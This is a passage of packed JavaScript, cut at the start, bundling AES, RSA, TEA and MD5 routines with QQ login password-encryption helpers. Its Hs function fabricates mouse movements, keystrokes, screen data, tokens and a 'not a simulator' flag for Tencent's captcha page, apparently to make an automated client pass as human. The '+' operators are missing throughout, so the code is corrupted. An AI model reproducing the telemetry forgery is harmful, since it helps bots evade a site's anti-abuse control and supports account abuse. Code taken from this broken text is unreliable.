a?c.R(a,7):a}}),k=(k.1O={}).37={2h:j(a,c,b,g){g||(g=q.1F(8));a=f.P({1w:c b}).compute(a,g);b=q.P(a.M.18(c),4*b);a.J=4*c;B v.P({1N:a,iv:b,1l:g})}},p=b.PasswordBasedCipher=c.E({I:c.I.E({1O:k}),1g:j(a,b,g,f){f=7.I.E(f);g=f.1O.2h(g,a.1w,a.2b);f.iv=g.iv;a=c.1g.O(7,a,b,g.1N,f);a.1H(g);B a},1x:j(a,b,g,f){f=7.I.E(f);b=7.2g(b,f.1y);g=f.1O.2h(g,a.1w,a.2b,b.1l);f.iv=g.iv;B c.1x.O(7,a,b,g.1N,f)}})}();(j(){D(o a=X,k=a.1s.34,b=a.25,g=[],q=[],l=[],m=[],f=[],n=[],u=[],w=[],r=[],v=[],c=[],p=0;3a>p;p  )c[p]=3b>p?p<<1:p<<1^283;D(o d=0,e=0,p=0;3a>p;p  ){o h=e^e<<1^e<<2^e<<3^e<<4,h=h>>>8^h&C^99;g[d]=h;q[h]=d;o x=c[d],y=c[x],z=c[y],t=3c*c[h]^3d*h;l[d]=t<<24|t>>>8;m[d]=t<<16|t>>>16;f[d]=t<<8|t>>>24;n[d]=t;t=16843009*z^65537*y^3c*x^3d*d;u[h]=t<<24|t>>>8;w[h]=t<<16|t>>>16;r[h]=t<<8|t>>>24;v[h]=t;d?(d=x^c[c[c[z^x]]],e^=c[c[e]]):d=e=1}o A=[0,1,2,4,8,16,32,64,3b,27,54],b=b.1X=k.E({21:j(){D(o a=7.2X,c=a.M,b=a.J/4,a=4*((7.3e=b 6) 1),d=7.3f=[],e=0;e<a;e  )K(e<b)d[e]=c[e];1c{o f=d[e-1];e%b?6<b&&4==e%b&&(f=g[f>>>24]<<24|g[f>>>16&C]<<16|g[f>>>8&C]<<8|g[f&C]):(f=f<<8|f>>>24,f=g[f>>>24]<<24|g[f>>>16&C]<<16|g[f>>>8&C]<<8|g[f&C],f^=A[e/b|0]<<24);d[e]=d[e-b]^f}c=7.3g=[];D(b=0;b<a;b  )e=a-b,f=b%4?d[e]:d[e-4],c[b]=4>b||4>=e?f:u[g[f>>>24]]^w[g[f>>>16&C]]^r[g[f>>>8&C]]^v[g[f&C]]},30:j(a,b){7.2i(a,b,7.3f,l,m,f,n,g)},31:j(a,b){o c=a[b 1];a[b 1]=a[b 3];a[b 3]=c;7.2i(a,b,7.3g,u,w,r,v,q);c=a[b 1];a[b 1]=a[b 3];a[b 3]=c},2i:j(a,b,c,d,e,f,g,h){D(o k=7.3e,l=a[b]^c[0],m=a[b 1]^c[1],n=a[b 2]^c[2],p=a[b 3]^c[3],q=4,r=1;r<k;r  )o t=d[l>>>24]^e[m>>>16&C]^f[n>>>8&C]^g[p&C]^c[q  ],u=d[m>>>24]^e[n>>>16&C]^f[p>>>8&C]^g[l&C]^c[q  ],v=d[n>>>24]^e[p>>>16&C]^f[l>>>8&C]^g[m&C]^c[q  ],p=d[p>>>24]^e[l>>>16&C]^f[m>>>8&C]^g[n&C]^c[q  ],l=t,m=u,n=v;t=(h[l>>>24]<<24|h[m>>>16&C]<<16|h[n>>>8&C]<<8|h[p&C])^c[q  ];u=(h[m>>>24]<<24|h[n>>>16&C]<<16|h[p>>>8&C]<<8|h[l&C])^c[q  ];v=(h[n>>>24]<<24|h[p>>>16&C]<<16|h[l>>>8&C]<<8|h[m&C])^c[q  ];p=(h[p>>>24]<<24|h[l>>>16&C]<<16|h[m>>>8&C]<<8|h[n&C])^c[q  ];a[b]=t;a[b 1]=u;a[b 2]=v;a[b 3]=p},1w:8});a.1X=k.22(b)})();o Hs=j(a,k,b,g){o q=1e.1B((V 1C).2l()),l=L(5,10),m=L(4,6),f=[[3h,600],[1P,2j],[1z,720],[1z,2j],[1z,3h],[1z,960],[1z,1P],[3i,2j],[3i,1P],[1Q,3j],[3k,1P],[3k,3l],[1800,1Q],[2k,1080],[2k,3l],[2k,1Q]],f=[1Q,3j],n=j(){o d=L(1,9).N();D(o x=0;x<9;x  )d =L(0,9).N();B 2O(d)},k=L(4,10);a={mousemove:1r(l),mouseclick:1r(0),keyvalue:1W(m),user_Agent:b?b:"chrome/53.0.2785.104;",resolutionx:f[0],resolutiony:f[1],winSize:[300,152],url:a?a:"3m://ssl.captcha.qq.3o/cap_union_new_show",refer:k?k:"3m://xui.ptlogin2.qq.3o/cgi-bin/xlogin",1A:1A,endtime:1e.1B(q/2m) L(5,10),platform:1,os:g?g:"Win7",keyboards:m,flash:1,pluginNum:L(1,50),index:1,ptcz:"",tokenid:n(),btokenid:1a,tokents:(1A)-L(631084,666666),ips:{},colorDepth:24,cookieEnabled:!0,timezone:8,wDelta:0,keyUpCnt:k,keyUpValue:1W(k),mouseUpValue:1r(1),mouseUpCnt:1,mouseDownValue:1r(1),mouseDownCnt:1,orientation:[],bSimutor:0,focusBlur:{"in":[q L(4,5)],out:[],t:[]},fVersion:23.9,charSet:"utf-8",resizeCnt:0,errors:[],screenInfo:f[0] "-" f[1] "-818-24-*-*-*",elapsed:0,ft:"qf_7P_n_H",clientType:"2",trycnt:1,refreshcnt:0};a=Y.U(a);o 1l=15-a["Q"];D(i=0;i<1l;i  ){a =" "};B 2P(1f(a))};',[],211,'|||||||this||||||||||||function|||||var|||||||||||||return|255|for|extend||typeof|init|cfg|sigBytes|if|Rnd|words|toString|call|create|length|parse|push||stringify|new|prototype|CryptoJS|JSON||||reset|blockSize|string|||object|slice|toJSON|null|join|else|mode|Math|enc|encrypt|clone|_data|_process|finalize|salt|replace|case|String|hasOwnProperty|padding|GetMonseMove|lib|concat|_append|charAt|keySize|decrypt|format|1280|begintime|round|Date|apply||random|pad|mixIn|_doFinalize|createEncryptor|_ENC_XFORM_MODE|createDecryptor|ciphertext|key|kdf|1024|1440|test|charCodeAt|number|Object|throw|RndKey|AES|WordArray|clamp|_minBufferSize|_doReset|_createHelper|||algo|_map|||indexOf|_xformMode|ivSize|_iv|_prevBlock|_cipher|processBlock|_parse|execute|_doCryptBlock|768|1920|getTime|1000|lastIndex|0000|isFinite|valueOf|u00ad|u0600|u0604|u070f|u17b4|u17b5|u200c|u200f|u2028|u202f|u2060|u206f|ufeff|ufff0|uffff|Error|Utf8|CBC|Pkcs7|Base|super|arguments|ceil|parseInt|encodeURIComponent|BufferedBlockAlgorithm|_nDataBytes|_doProcessBlock|splice|Base64|Cipher|_DEC_XFORM_MODE|_key|Encryptor|Decryptor|encryptBlock|decryptBlock||unpad|BlockCipher|_mode|formatter|OpenSSL|1398893684|1701076831|256|128|257|16843008|_nRounds|_keySchedule|_invKeySchedule|800|1360|900|1600|1200|https||com'.split('|'),0,{}))
eval(function(p,a,c,k,e,r){e=function(c){return(c<62?'':e(parseInt(c/62))) ((c=cb)>35?String.fromCharCode(c 29):c.toString(36))};if('0'.replace(0,e)==0){while(c--)r[e(c)]=k[c];k=[function(e){return r[e]||e}];e=function(){return'([RT-Z]|[12]\\w)'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('T 1C=U(){U t(){R.n=19;R.e=0;R.coeff=R.dmq1=R.dmp1=R.q=R.p=R.d=19}U B(A,x,H){19!=A&&("number"==2j A?R.fromNumber(A,x,H):19==x&&"string"!=2j A?R.1P(A,1x):R.1P(A,x))}U z(){V 1g B(19)}U I(A){T x=z();V x.1Q(A),x}U J(A){T x,H=1;V 0!=(x=A>>>16)&&(A=x,H =16),0!=(x=A>>8)&&(A=x,H =8),0!=(x=A>>4)&&(A=x,H =4),0!=(x=A>>2)&&(A=x,H =2),0!=A>>1&&(H =1),H}U K(A){R.m=A}U L(A){R.m=A;R.mp=A.2k();R.1S=1D&R.mp;R.2l=R.mp>>15;R.um=(1<<A.DB-15)-1;R.2n=2*A.t}U M(A){F[N  ]^=1b&A;F[N  ]^=A>>8&1b;F[N  ]^=A>>16&1b;F[N  ]^=A>>24&1b;N>=P&&(N-=P)}U O(){}U Q(){R.j=R.i=0;R.S=[]}t.X.2o=U(A){V A.2p(R.e,R.n)};t.X.2q=U(A,x){19!=A&&19!=x&&0<A.Z&&0<x.Z?(R.n=1g B(A,16),R.e=1E(x,16)):2r("Invalid 1C public key")};t.X.1H=U(A){T x;x=R.n.2s() 7>>3;Y(x<A.Z 11)x=(2r("Message too long W 1C"),19);1d{W(T H=[],C=A.Z-1;0<=C&&0<x;){T t=A.1s(C--);H[--x]=t}H[--x]=0;A=1g O;W(C=[];2<x;){W(C[0]=0;0==C[0];)A.2t(C);H[--x]=C[0]}x=(H[--x]=2,H[--x]=0,1g B(H))}Y(19==x)V 19;x=R.2o(x);Y(19==x)V 19;x=x.1n(16);V 0==(1&x.Z)?x:"0" x};B.X.am=U(A,x,H,C,B,t){T z=1D&x;W(x>>=15;0<=--t;){T D=1D&R[A],E=R[A  ]>>15,G=x*D E*z,D=z*D ((1D&G)<<15) H[C] (1T&B);B=(D>>>30) (G>>>15) x*E (B>>>30);H[C  ]=1T&D}V B};B.X.DB=30;B.X.DM=1T;B.X.DV=1073741824;B.X.FV=1i.pow(2,52);B.X.F1=22;B.X.F2=8;T C,G,D=[];C=48;W(G=0;9>=G;  G)D[C  ]=G;C=97;W(G=10;36>G;  G)D[C  ]=G;C=65;W(G=10;36>G;  G)D[C  ]=G;K.X.1W=U(A){V 0>A.s||0<=A.1y(R.m)?A.2v(R.m):A};K.X.1X=U(A){V A};K.X.1u=U(A){A.1I(R.m,19,A)};K.X.1Y=U(A,x,H){A.1Z(x,H);R.1u(H)};K.X.25=U(A,x){A.26(x);R.1u(x)};L.X.1W=U(A){T x=z();V A.1o().1F(R.m.t,x),x.1I(R.m,19,x),0>A.s&&0<x.1y(B.1p)&&R.m.1e(x,x),x};L.X.1X=U(A){T x=z();V A.1z(x),R.1u(x),x};L.X.1u=U(A){W(;A.t<=R.2n;)A[A.t  ]=0;W(T x=0;x<R.m.t;  x){T H=1D&A[x],B=H*R.1S ((H*R.2l (A[x]>>15)*R.1S&R.um)<<15)&A.DM,H=x R.m.t;W(A[H] =R.m.am(0,B,A,x,0,R.m.t);A[H]>=A.DV;)A[H]-=A.DV,A[  H]  }A.1k();A.27(R.m.t,A);0<=A.1y(R.m)&&A.1e(R.m,A)};L.X.1Y=U(A,x,H){A.1Z(x,H);R.1u(H)};L.X.25=U(A,x){A.26(x);R.1u(x)};B.X.1z=U(A){W(T x=R.t-1;0<=x;--x)A[x]=R[x];A.t=R.t;A.s=R.s};B.X.1Q=U(A){R.t=1;R.s=0>A?-1:0;0<A?R[0]=A:-1>A?R[0]=A DV:R.t=0};B.X.1P=U(A,x){Y(16==x)x=4;1d Y(8==x)x=3;1d Y(1x==x)x=8;1d Y(2==x)x=1;1d Y(32==x)x=5;1d{Y(4!=x)V 28 R.fromRadix(A,x);x=2}R.s=R.t=0;W(T H=A.Z,C=!1,t=0;0<=--H;){T z;8==x?z=1b&A[H]:(z=D[A.1s(H)],z=19==z?-1:z);0>z?"-"==A.1c(H)&&(C=!0):(C=!1,0==t?R[R.t  ]=z:t x>R.DB?(R[R.t-1]|=(z&(1<<R.DB-t)-1)<<t,R[R.t  ]=z>>R.DB-t):R[R.t-1]|=z<<t,t =x,t>=R.DB&&(t-=R.DB))}8==x&&0!=(1A&A[0])&&(R.s=-1,0<t&&(R[R.t-1]|=(1<<R.DB-t)-1<<t));R.1k();C&&B.1p.1e(R,R)};B.X.1k=U(){W(T A=R.s&R.DM;0<R.t&&R[R.t-1]==A;)--R.t};B.X.1F=U(A,x){T H;W(H=R.t-1;0<=H;--H)x[H A]=R[H];W(H=A-1;0<=H;--H)x[H]=0;x.t=R.t A;x.s=R.s};B.X.27=U(A,x){W(T H=A;H<R.t;  H)x[H-A]=R[H];x.t=1i.max(R.t-A,0);x.s=R.s};B.X.29=U(A,x){T H=A%R.DB,C=R.DB-H,B=(1<<C)-1,t=1i.1J(A/R.DB),z=R.s<<H&R.DM;W(A=R.t-1;0<=A;--A)x[A t 1]=R[A]>>C|z,z=(R[A]&B)<<H;W(A=t-1;0<=A;--A)x[A]=0;x[t]=z;x.t=R.t t 1;x.s=R.s;x.1k()};B.X.2w=U(A,x){x.s=R.s;T H=1i.1J(A/R.DB);Y(H>=R.t)V 28(x.t=0);A$=R.DB;T C=R.DB-A,B=(1<<A)-1;x[0]=R[H]>>A;W(T t=H 1;t<R.t;  t)x[t-H-1]|=(R[t]&B)<<C,x[t-H]=R[t]>>A;0<A&&(x[R.t-H-1]|=(R.s&B)<<C);x.t=R.t-H;x.1k()};B.X.1e=U(A,x){W(T H=0,t=0,C=1i.min(A.t,R.t);C>H;)t =R[H]-A[H],x[H  ]=t&R.DM,t>>=R.DB;Y(A.t<R.t){W(t-=A.s;H<R.t;)t =R[H],x[H  ]=t&R.DM,t>>=R.DB;t =R.s}1d{W(t =R.s;H<A.t;)t-=A[H],x[H  ]=t&R.DM,t>>=R.DB;t-=A.s}x.s=0>t?-1:0;-1>t?x[H  ]=R.DV t:0<t&&(x[H  ]=t);x.t=H;x.1k()};B.X.1Z=U(A,x){T t=R.1o(),C=A.1o(),z=t.t;W(x.t=z C.t;0<=--z;)x[z]=0;W(z=0;z<C.t;  z)x[z t.t]=t.am(0,C[z],x,z,0,t.t);x.s=0;x.1k();R.s!=A.s&&B.1p.1e(x,x)};B.X.26=U(A){W(T x=R.1o(),t=A.t=2*x.t;0<=--t;)A[t]=0;W(t=0;t<x.t-1;  t){T C=x.am(t,x[t],A,2*t,0,1);(A[t x.t] =x.am(t 1,2*x[t],A,2*t 1,C,x.t-t-1))>=x.DV&&(A[t x.t]-=x.DV,A[t x.t 1]=1)}0<A.t&&(A[A.t-1] =x.am(t,x[t],A,2*t,0,1));A.s=0;A.1k()};B.X.1I=U(A,x,t){T C=A.1o();Y(!(0>=C.t)){T D=R.1o();Y(D.t<C.t)V 19!=x&&x.1Q(0),28(19!=t&&R.1z(t));19==t&&(t=z());T E=z(),G=R.s;A=A.s;T F=R.DB-J(C[C.t-1]);0<F?(C.29(F,E),D.29(F,t)):(C.1z(E),D.1z(t));C=E.t;D=E[C-1];Y(0!=D){T H=D*(1<<R.F1) (1<C?E[C-2]>>R.F2:0),N=R.FV/H,H=(1<<R.F1)/H,I=1<<R.F2,K=t.t,L=K-C,M=19==x?z():x;E.1F(L,M);0<=t.1y(M)&&(t[t.t  ]=1,t.1e(M,t));B.2a.1F(C,M);W(M.1e(E,E);E.t<C;)E[E.t  ]=0;W(;0<=--L;){T P=t[--K]==D?R.DM:1i.1J(t[K]*N (t[K-1] I)*H);Y((t[K] =E.am(0,P,t,L,0,C))<P)W(E.1F(L,M),t.1e(M,t);t[K]<--P;)t.1e(M,t)}19!=x&&(t.27(C,x),G!=A&&B.1p.1e(x,x));t.t=C;t.1k();0<F&&t.2w(F,t);0>G&&B.1p.1e(t,t)}}};B.X.2k=U(){Y(1>R.t)V 0;T t=R[0];Y(0==(1&t))V 0;T x=3&t;V x=x*(2-(15&t)*x)&15,x=x*(2-(1b&t)*x)&1b,x=x*(2-((1v&t)*x&1v))&1v,x=x*(2-t*x%R.DV)%R.DV,0<x?R.DV-x:-x};B.X.2x=U(){V 0==(0<R.t?1&R[0]:R.s)};B.X.2y=U(t,x){Y(1l<t||1>t)V B.2a;T A=z(),C=z(),D=x.1W(R),E=J(t)-1;W(D.1z(A);0<=--E;)Y(x.25(A,C),0<(t&1<<E))x.1Y(C,D,A);1d T G=A,A=C,C=G;V x.1X(A)};B.X.1n=U(t){Y(0>R.s)V"-" R.2b().1n(t);Y(16==t)t=4;1d Y(8==t)t=3;1d Y(2==t)t=1;1d Y(32==t)t=5;1d{Y(4!=t)V R.toRadix(t);t=2}T x,A=(1<<t)-1,C=!1,B="",z=R.t,D=R.DB-z*R.DB%t;Y(0<z--)W(D<R.DB&&0<(x=R[z]>>D)&&(C=!0,B="2z".1c(x));0<=z;)t>D?(x=(R[z]&(1<<D)-1)<<t-D,x|=R[--z]>>(D =R.DB-t)):(x=R[z]>>(D-=t)&A,0>=D&&(D =R.DB,--z)),0<x&&(C=!0),C&&(B ="2z".1c(x));V C?B:"0"};B.X.2b=U(){T t=z();V B.1p.1e(R,t),t};B.X.1o=U(){V 0>R.s?R.2b():R};B.X.1y=U(t){T x=R.s-t.s;Y(0!=x)V x;T A=R.t;Y(x=A-t.t,0!=x)V x;W(;0<=--A;)Y(0!=(x=R[A]-t[A]))V x;V 0};B.X.2s=U(){V 0>=R.t?0:R.DB*(R.t-1) J(R[R.t-1]^R.s&R.DM)};B.X.2v=U(t){T x=z();V R.1o().1I(t,19,x),0>R.s&&0<x.1y(B.1p)&&t.1e(x,x),x};B.X.2p=U(t,x){T A;V A=1x>t||x.2x()?1g K(x):1g L(x),R.2y(t,A)};B.1p=I(0);B.2a=I(1);T E,F,N;Y(19==F){F=[];W(N=0;P>N;)C=1i.1J(65536*1i.2A()),F[N  ]=C>>>8,F[N  ]=1b&C;N=0;M((1g 2B).2C())}O.X.2t=U(t){T x;W(x=0;x<t.Z;  x){T A=x,C;Y(19==E){M((1g 2B).2C());E=1g Q;E.2D(F);W(N=0;N<F.Z;  N)F[N]=0;N=0}C=E.2E();t[A]=C}};Q.X.2D=U(t){T x,C,A;W(x=0;1x>x;  x)R.S[x]=x;W(x=C=0;1x>x;  x)C=C R.S[x] t[x%t.Z]&1b,A=R.S[x],R.S[x]=R.S[C],R.S[C]=A;R.j=R.i=0};Q.X.2E=U(){T t;V R.i=R.i 1&1b,R.j=R.j R.S[R.i]&1b,t=R.S[R.i],R.S[R.i]=R.S[R.j],R.S[R.j]=t,R.S[t R.S[R.i]&1b]};T P=1x;V{2c:U(C,x,z){x="e9a815ab9d6e86abbf33a4ac64e9196d5be44a09bd0ed6ae052914e1a865ac8331fed863de8ea697e9a7f63329e5e23cda09c72570f46775b7e39ea9670086f847d3c9c51963b131409b1e04265d9747419c635404ca651bbcbc87f99b8008f7f5824653e3658be4ba73e4480156b390bb73bc1f8b33578e7a4e12440e9396f2552c1aff1c92e797ebacdc37c109ab7bce2367a19c56a033ee04534723cc2558cb27368f5b9d32c04d12dbd86bbd68b1d99b7c349a8453ea75d1b2e94491ab30acf6c46a36a75b721b312bedf4e7aad21e54e9bcbcf8144c79b6e3c05eb4a1547750d224c0085d80e6da3907c3d945051c13c7c1dcefd6520ee8379c4f5231ed";z="10001";T A=1g t;V A.2q(x,z),A.1H(C)}}}();U e(){V 1i.round(1l*1i.2A())}U i(t,B,z){(!z||4<z)&&(z=4);W(T I=0,J=B;B z>J;J  )I<<=8,I|=t[J];V(1l&I)>>>0}U n(t,B,z){t[B 3]=z>>0&1b;t[B 2]=z>>8&1b;t[B 1]=z>>16&1b;t[B 0]=z>>24&1b}U o(t){Y(!t)V"";W(T B="",z=0;z<t.Z;z  ){T I=2d(t[z]).1n(16);1==I.Z&&(I="0" I);B =I}V B}U p(t){W(T B="",z=0;z<t.Z;z =2)B =1q.1r(1E(t.1K(z,2),16));V B}U r(t,B){Y(!t)V"";B&&(t=s(t));B=[];W(T z=0;z<t.Z;z  )B[z]=t.1s(z);V o(B)}U s(t){T B,z,I=[],J=t.Z;W(B=0;J>B;B  )z=t.1s(B),0<z&&127>=z?I.1f(t.1c(B)):1A<=z&&2047>=z?I.1f(1q.1r(192|z>>6&31),1q.1r(1A|63&z)):2048<=z&&1v>=z&&I.1f(1q.1r(224|z>>12&15),1q.1r(1A|z>>6&63),1q.1r(1A|63&z));V I.1L("")}U a(t){_=1w(8);$=1w(8);v=y=0;b=!0;m=0;T B=t.Z,z;m=(B 10)%8;0!=m&&(m=8-m);w=1w(B m 10);_[0]=1b&(248&e()|m);W(z=1;m>=z;z  )_[z]=1b&e();m  ;W(z=0;8>z;z  )$[z]=0;W(z=1;2>=z;)8>m&&(_[m  ]=1b&e(),z  ),8==m&&c();W(z=0;0<B;)8>m&&(_[m  ]=t[z  ],B--),8==m&&c();W(z=1;7>=z;)8>m&&(_[m  ]=0,z  ),8==m&&c();V w}U l(t){T B=0,z=1w(8),I=t.Z;Y((k=t,0!=I%8||16>I)||($=g(t),m=7&$[0],B=I-m-10,0>B))V 19;W(I=0;I<z.Z;I  )z[I]=0;w=1w(B);y=0;v=8;m  ;W(I=1;2>=I;)Y(8>m&&(m  ,I  ),8==m&&(z=t,!d()))V 19;W(I=0;0!=B;)Y(8>m&&(w[I]=1b&(z[y m]^$[m]),I  ,B--,m  ),8==m&&(z=t,y=v-8,!d()))V 19;W(I=1;8>I;I  ){Y(8>m){Y(0!=(z[y m]^$[m]))V 19;m  }Y(8==m&&(z=t,y=v,!d()))V 19}V w}U c(){W(T t=0;8>t;t  )_[t]^=b?$[t]:w[y t];W(T B=u(_),t=0;8>t;t  )w[v t]=B[t]^$[t],$[t]=_[t];y=v;v =8;m=0;b=!1}U u(t){T B=16,z=i(t,0,4);t=i(t,4,4);W(T I=i(f,0,4),J=i(f,4,4),K=i(f,8,4),L=i(f,12,4),M=0;0<B--;)M =2F,M=(1l&M)>>>0,z =(t<<4) I^t M^(t>>>5) J,z=(1l&z)>>>0,t =(z<<4) K^z M^(z>>>5) L,t=(1l&t)>>>0;B=1w(8);V n(B,0,z),n(B,4,t),B}U g(t){T B=16,z=i(t,0,4);t=i(t,4,4);W(T I=i(f,0,4),J=i(f,4,4),K=i(f,8,4),L=i(f,12,4),M=3816266640;0<B--;)t-=(z<<4) K^z M^(z>>>5) L,t=(1l&t)>>>0,z-=(t<<4) I^t M^(t>>>5) J,z=(1l&z)>>>0,M-=2F,M=(1l&M)>>>0;B=1w(8);V n(B,0,z),n(B,4,t),B}U d(){W(T t=(k.Z,0);8>t;t  )$[t]^=k[v t];V $=g($),v =8,m=0,!0}U h(t,B){T z=[];Y(B)W(B=0;B<t.Z;B  )z[B]=1b&t.1s(B);1d{T I=0;W(B=0;B<t.Z;B =2)z[I  ]=1E(t.1K(B,2),16)}V z}T f="",m=0,_=[],$=[],v=0,y=0,w=[],k=[],b=!0,1B={1H:U(t,B){t=h(t,B);t=a(t);V o(t)},enAsBase64:U(t,B){t=h(t,B);/*Hs*/t=a(t);B="";W(T z=0;z<t.Z;z  )B =1q.1r(t[z]);V btoa(B)},decrypt:U(t){t=h(t,!1);t=l(t);V o(t)},2e:U(t,B){f=h(t,B)},bytesToStr:p,2f:r,bytesInStr:o,dataFromStr:h},q={2G:"=",2H:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /",2I:U(t,B){t=t.1s(B);Y(1b<t)2J"INVALID_CHARACTER_ERR: DOM Exception 5";V t},2K:U(t){Y(1!=2L.Z)2J"SyntaxError: Not enough 2L";T B,z,I=q.2G,J=q.2H,K=q.2I,L=[];t="" t;T M=t.Z-t.Z%3;Y(0==t.Z)V t;W(B=0;M>B;B =3)z=K(t,B)<<16|K(t,B 1)<<8|K(t,B 2),L.1f(J.1c(z>>18)),L.1f(J.1c(z>>12&63)),L.1f(J.1c(z>>6&63)),L.1f(J.1c(63&z));switch(t.Z-M){2M 1:z=K(t,B)<<16;L.1f(J.1c(z>>18) J.1c(z>>12&63) I I);2N;2M 2:z=K(t,B)<<16|K(t,B 1)<<8,L.1f(J.1c(z>>18) J.1c(z>>12&63) J.1c(z>>6&63) I)}V L.1L("")}};1M=U(){U t(t){W(T G=[],D=(1<<O)-1,E=0;E<t.Z*O;E =O)G[E>>5]|=(t.1s(E/O)&D)<<E2;t=t.Z*O;G[t>>5]|=1A<<t2;G[(t 64>>>9<<4) 14]=t;t=1732584193;W(T D=-271733879,E=-1732584194,F=271733878,C=0;C<G.Z;C =16){T L=t,A=D,x=E,H=F;t=z(t,D,E,F,G[C 0],7,-680876936);F=z(F,t,D,E,G[C 1],12,-389564586);E=z(E,F,t,D,G[C 2],17,606105819);D=z(D,E,F,t,G[C 3],22,-1044525330);t=z(t,D,E,F,G[C 4],7,-176418897);F=z(F,t,D,E,G[C 5],12,1200080426);E=z(E,F,t,D,G[C 6],17,-1473231341);D=z(D,E,F,t,G[C 7],22,-45705983);t=z(t,D,E,F,G[C 8],7,1770035416);F=z(F,t,D,E,G[C 9],12,-1958414417);E=z(E,F,t,D,G[C 10],17,-42063);D=z(D,E,F,t,G[C 11],22,-1990404162);t=z(t,D,E,F,G[C 12],7,1804603682);F=z(F,t,D,E,G[C 13],12,-40341101);E=z(E,F,t,D,G[C 14],17,-1502002290);D=z(D,E,F,t,G[C 15],22,1236535329);t=I(t,D,E,F,G[C 1],5,-165796510);F=I(F,t,D,E,G[C 6],9,-1069501632);E=I(E,F,t,D,G[C 11],14,643717713);D=I(D,E,F,t,G[C 0],20,-373897302);t=I(t,D,E,F,G[C 5],5,-701558691);F=I(F,t,D,E,G[C 10],9,38016083);E=I(E,F,t,D,G[C 15],14,-660478335);D=I(D,E,F,t,G[C 4],20,-405537848);t=I(t,D,E,F,G[C 9],5,568446438);F=I(F,t,D,E,G[C 14],9,-1019803690);E=I(E,F,t,D,G[C 3],14,-187363961);D=I(D,E,F,t,G[C 8],20,1163531501);t=I(t,D,E,F,G[C 13],5,-1444681467);F=I(F,t,D,E,G[C 2],9,-51403784);E=I(E,F,t,D,G[C 7],14,1735328473);D=I(D,E,F,t,G[C 12],20,-1926607734);t=B(D^E^F,t,D,G[C 5],4,-378558);F=B(t^D^E,F,t,G[C 8],11,-2022574463);E=B(F^t^D,E,F,G[C 11],16,1839030562);D=B(E^F^t,D,E,G[C 14],23,-35309556);t=B(D^E^F,t,D,G[C 1],4,-1530992060);F=B(t^D^E,F,t,G[C 4],11,1272893353);E=B(F^t^D,E,F,G[C 7],16,-155497632);D=B(E^F^t,D,E,G[C 10],23,-1094730640);t=B(D^E^F,t,D,G[C 13],4,681279174);F=B(t^D^E,F,t,G[C 0],11,-358537222);E=B(F^t^D,E,F,G[C 3],16,-722521979);D=B(E^F^t,D,E,G[C 6],23,76029189);t=B(D^E^F,t,D,G[C 9],4,-640364487);F=B(t^D^E,F,t,G[C 12],11,-421815835);E=B(F^t^D,E,F,G[C 15],16,530742520);D=B(E^F^t,D,E,G[C 2],23,-995338651);t=J(t,D,E,F,G[C 0],6,-198630844);F=J(F,t,D,E,G[C 7],10,1126891415);E=J(E,F,t,D,G[C 14],15,-1416354905);D=J(D,E,F,t,G[C 5],21,-57434055);t=J(t,D,E,F,G[C 12],6,1700485571);F=J(F,t,D,E,G[C 3],10,-1894986606);E=J(E,F,t,D,G[C 10],15,-1051523);D=J(D,E,F,t,G[C 1],21,-2054922799);t=J(t,D,E,F,G[C 8],6,1873313359);F=J(F,t,D,E,G[C 15],10,-30611744);E=J(E,F,t,D,G[C 6],15,-1560198380);D=J(D,E,F,t,G[C 13],21,1309151649);t=J(t,D,E,F,G[C 4],6,-145523070);F=J(F,t,D,E,G[C 11],10,-1120210379);E=J(E,F,t,D,G[C 2],15,718787259);D=J(D,E,F,t,G[C 9],21,-343485551);t=K(t,L);D=K(D,A);E=K(E,x);F=K(F,H)}G=16==Q?[D,E]:[t,D,E,F];t=M?"0123456789ABCDEF":"0123456789abcdef";D="";W(E=0;E<4*G.Z;E  )D =t.1c(G[E>>2]>>E%4*8 4&15) t.1c(G[E>>2]>>E%4*8&15);V D}U B(t,z,B,E,F,I){t=K(K(z,t),K(E,I));V K(t<<F|t>>>32-F,B)}U z(t,z,D,E,F,I,J){V B(z&D|~z&E,t,z,F,I,J)}U I(t,z,D,E,F,I,J){V B(z&E|D&~E,t,z,F,I,J)}U J(t,z,D,E,F,I,J){V B(D^(z|~E),t,z,F,I,J)}U K(t,z){T B=(1v&t) (1v&z);V(t>>16) (z>>16) (B>>16)<<16|1v&B}U L(t){W(T z=[],B=0;B<t.Z;B =2)z.1f(1q.1r(1E(t.1K(B,2),16)));V z.1L("")}T M=1,O=8,Q=32;V{2g:U(z,B,D,E){D=D||"";z=z||"";z=E?z:t(z);E=L(z);E=t(E B);D=1B.2f(D.2O(),!0);W(T C=2d(D.Z/2).1n(16);4>C.Z;)C="0" C;1B.2e(E);B=1B.1H(z 1B.2f(B) C D);1B.2e("");W(D=2d(B.Z/2).1n(16);4>D.Z;)D="0" D;B=1C.2c(L(D B));V q.2K(L(B)).replace(/[\\/\\ =]/g,U(t){V{"/":"-"," ":"*","=":"_"}[t]})},getRSAEncryption:U(z,B,D){z=(D?z:t(z)) B.2O();V 1C.2c(z)},2P:U(z){V t(z)}}}();U Hs(t,B,z){V 1M.2g(t,B,z,!1)}U getmd5(2Q,p,2R){T e=2S(2Q);T p=1M.2g(p,e,2R,false);V p}U 2S(1N){T 2h=16;1N=1E(1N);T 1G=1N.1n(16);T 2T=1G.Z;W(T i=2T;i<2h;i  ){1G="0" 1G}T 2i=[];W(T j=0;j<2h;j =2){2i.1f("\\\\x" 1G.1K(j,2))}T 1O=2i.1L("");eval(\'1O="\' 1O \'"\');V 1O}U cdata(t,B,z){W(T I=0,J=0;J<B&&1E3>J;J  ){T K=1M.2P(z J),K=K.2U();Y(t.2U()==K){I=J;2N}}V I.1n()};',[],181,'|||||||||||||||||||||||||||||||||||||||||||||||||||||this||var|function|return|for|prototype|if|length||||||||||null||255|charAt|else|subTo|push|new||Math||clamp|4294967295||toString|abs|ZERO|String|fromCharCode|charCodeAt||reduce|65535|Array|256|compareTo|copyTo|128|TEA|RSA|32767|parseInt|dlShiftTo|hex|encrypt|divRemTo|floor|substr|join|Encryption|str|result|fromString|fromInt||mpl|1073741823|||convert|revert|mulTo|multiplyTo||||||sqrTo|squareTo|drShiftTo|void|lShiftTo|ONE|negate|rsa_encrypt|Number|initkey|strToBytes|getEncryption|maxLength|arr|typeof|invDigit|mph||mt2|doPublic|modPowInt|setPublic|uv_alert|bitLength|nextBytes||mod|rShiftTo|isEven|exp|0123456789abcdefghijklmnopqrstuvwxyz|random|Date|getTime|init|next|26